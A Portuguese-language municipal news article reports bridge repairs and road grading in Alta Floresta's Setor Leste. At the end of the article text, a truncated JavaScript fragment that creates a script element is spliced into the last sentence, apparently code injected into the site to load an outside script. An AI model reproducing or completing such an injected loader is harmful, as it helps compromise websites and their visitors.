Capa / Em Destaque / Infraestrutura recupera pontes e mantém trafegabilidade no Setor Leste

Infraestrutura recupera pontes e mantém trafegabilidade no Setor Leste

capa PONTELindomar Leal

Assessoria da PMAF

A Prefeitura de Alta Floresta por meio da Secretaria Municipal de Infraestrutura conclui na sexta-feira (27.11) a recuperação e construção de duas pontes no Setor Leste e manteve a trafegabilidade nas vicinais.

Na vicinal 4ª Leste foi recuperado uma ponte de doze metros de comprimento por sete metros de largura. As pranchas que tinha sido danificada pelo desgaste do tempo foram substituídas por pranchas novas, inclusive, a triagem (local de passagem dos veículos) também ganhou novo madeiramento.

A outra ponte recuperada exigiu um esforço maior porte da equipe da Secretaria Municipal de Infraestrutura. Localizada na Estrada do Pequi, vicinal que interliga a 4ª e a 3ª Leste, a ponte antiga com dez metros de comprimento, era muito grande para um volume relativamente baixo de água do córrego. Para resolver o problema removida a ponte antiga, aterrado o local e construído uma ponte nova com aproximadamente quatro metros e meio.

O secretário Eloi Luiz de Almeida vistoriou o serviço e informou que as toras retiradas da ponte da Estrada do Pequi serão reaproveitadas em outros serviços. A madeira está em bom estado e será útil na construção de pequenas pontes, por exemplo. Para executar o serviço o secretário designou a retroescavadeira, um caminhão basculante e cinco funcionários.

Recuperação da 3ª Leste

Na segunda-feira (30.11) a Secretaria de Infraestrutura iniciou o patrolamento da 3ª Leste. Duas motoniveladoras estão patrolando, fazendo saída de água e recuperando os pontos críticos. De acordo com o secretário Eloi Luiz de Almeida, que acompanhou o início do serviço, o objetivo é recuperar a vicinal de ponta a ponta para garantir condições de trafegabilidade para os produtores e para o transporte escolar, melhorando inclusive a retirada da produção.

No início desse semestre a Secretaria de Infraestrutura patrolou e cascalhou uma trecho de aproximadamente 20 quilômetros da mesma vicinal, sentido Fazenda Nortão. Agora o serviço está sendo executado no trecho que passa pela Comunidade Mundo Novo e sai no Setor Norte.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top